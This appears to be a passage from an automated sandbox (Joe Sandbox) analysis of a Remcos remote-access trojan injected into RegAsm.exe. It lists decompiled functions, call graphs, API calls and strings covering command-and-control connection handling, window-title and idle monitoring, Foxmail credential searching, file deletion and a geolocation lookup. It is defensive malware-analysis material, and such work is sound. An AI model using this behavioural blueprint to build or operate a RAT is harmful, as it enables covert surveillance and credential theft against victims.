                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-I89M3S$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                • API String ID: 2830904901-2139572810
                                                                • Opcode ID: 1ef5b7d803f19f36c27cfa4c3c688568fcd5b6882c3006592bcd47f55126cf3d
                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                • Opcode Fuzzy Hash: 1ef5b7d803f19f36c27cfa4c3c688568fcd5b6882c3006592bcd47f55126cf3d
                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                Function 00414F65 Relevance: 49.8, APIs: 5, Strings: 23, Instructions: 809sleepnetworkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 612 415220-415246 call 402093 * 2 call 41b580 606->612 613 41524b-415260 call 404f51 call 4048c8 606->613 629 415ade-415af0 call 404e26 call 4021fa 607->629 612->629 628 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 613->628 613->629 694 4153bb-4153c8 call 405aa6 628->694 695 4153cd-4153f4 call 401fab call 4135e1 628->695 643 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 629->643 644 415b18-415b20 call 401e8d 629->644 643->644 644->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-415a45 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 695->702 701->702 947 415a4a-415a51 702->947 948 415a53-415a5a 947->948 949 415a65-415a6c 947->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->629
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-I89M3S$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                • API String ID: 524882891-2075655159
                                                                • Opcode ID: 40e290f1c005af965ae0c338ba664b88dcf684986f60e650252d79466ad5e308
                                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                • Opcode Fuzzy Hash: 40e290f1c005af965ae0c338ba664b88dcf684986f60e650252d79466ad5e308
                                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1094 412e43-412e5f call 401f04 call 41c516 1091->1094 1092->1094 1100 412e61-412e73 call 401f04 DeleteFileW 1094->1100 1101 412e79-412e7b 1094->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1107 412e99-412eab call 406b63 1103->1107 1104->1103 1106 412e81-412e86 1104->1106 1106->1103 1106->1107 1110 412f01-412f20 call 401f09 * 3 1107->1110 1111 412ead-412ebb call 406b63 1107->1111 1123 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1123 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1122 412ecd-412ef9 Sleep call 401f09 * 3 1117->1122 1122->978 1137 412eff 1122->1137 1138 412f63-412f89 call 401f09 call 405b05 1123->1138 1137->1123 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BFB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                                • API String ID: 1223786279-2576077980
                                                                • Opcode ID: 55edfecb0d873be99d9e7b4341737605b4e58020463b7935fc33a56a4547f2ce
                                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                • Opcode Fuzzy Hash: 55edfecb0d873be99d9e7b4341737605b4e58020463b7935fc33a56a4547f2ce
                                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                • String ID: )$Foxmail$ProgramFiles
                                                                • API String ID: 672098462-2938083778
                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                • API String ID: 3795512280-1152054767
                                                                • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1384 4048c8-4048e8 connect 1385 404a1b-404a1f 1384->1385 1386 4048ee-4048f1 1384->1386 1389 404a21-404a2f WSAGetLastError 1385->1389 1390 404a97 1385->1390 1387 404a17-404a19 1386->1387 1388 4048f7-4048fa 1386->1388 1391 404a99-404a9e 1387->1391 1392 404926-404930 call 420cf1 1388->1392 1393 4048fc-404923 call 40531e call 402093 call 41b580 1388->1393 1389->1390 1394 404a31-404a34 1389->1394 1390->1391 1404 404941-40494e call 420f20 1392->1404 1405 404932-40493c 1392->1405 1393->1392 1397 404a71-404a76 1394->1397 1398 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1394->1398 1401 404a7b-404a94 call 402093 * 2 call 41b580 1397->1401 1398->1390 1401->1390 1418 404950-404973 call 402093 * 2 call 41b580 1404->1418 1419 404987-404992 call 421ad1 1404->1419 1405->1401 1445 404976-404982 call 420d31 1418->1445 1430 4049c4-4049d1 call 420e97 1419->1430 1431 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1419->1431 1442 4049d3-4049f6 call 402093 * 2 call 41b580 1430->1442 1443 4049f9-404a14 CreateEventW * 2 1430->1443 1431->1445 1442->1443 1443->1387 1445->1390
                                                                APIs
                                                                • connect.WS2_32(FFFFFFFF,013E6988,00000010), ref: 004048E0
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                • API String ID: 994465650-2151626615
                                                                • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                • String ID:
                                                                • API String ID: 3658366068-0
                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                • API String ID: 911427763-3954389425
                                                                • Opcode ID: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                • Opcode Fuzzy Hash: 67b6da18cae3e8576f7385e0c2c8ebcc1754692b360f15e2fa026ce444ac7b22
                                                                • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1556 40da6f-40da94 call 401f86 1559 40da9a 1556->1559 1560 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1556->1560 1562 40dae0-40dae7 call 41c048 1559->1562 1563 40daa1-40daa6 1559->1563 1564 40db93-40db98 1559->1564 1565 40dad6-40dadb 1559->1565 1566 40dba9 1559->1566 1567 40db9a-40db9f call 43c11f 1559->1567 1568 40daab-40dab9 call 41b645 call 401f13 1559->1568 1569 40dacc-40dad1 1559->1569 1570 40db8c-40db91 1559->1570 1584 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1562->1584 1585 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1562->1585 1572 40dbae-40dbb3 call 43c11f 1563->1572 1564->1572 1565->1572 1566->1572 1580 40dba4-40dba7 1567->1580 1587 40dabe 1568->1587 1569->1572 1570->1572 1586 40dbb4-40dbb9 call 409092 1572->1586 1580->1566 1580->1586 1592 40dac2-40dac7 call 401f09 1584->1592 1585->1587 1586->1560 1587->1592 1592->1560
                                                                APIs
                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LongNamePath
                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                • API String ID: 82841172-425784914
                                                                • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1671 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1676 41b456-41b477 InternetReadFile 1671->1676 1677 41b479-41b499 call 4020b7 call 403376 call 401fd8 1676->1677 1678 41b49d-41b4a0 1676->1678 1677->1678 1680 41b4a2-41b4a4 1678->1680 1681 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1678->1681 1680->1676 1680->1681 1684 41b4b8-41b4c2 1681->1684
                                                                APIs
                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                Strings
                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
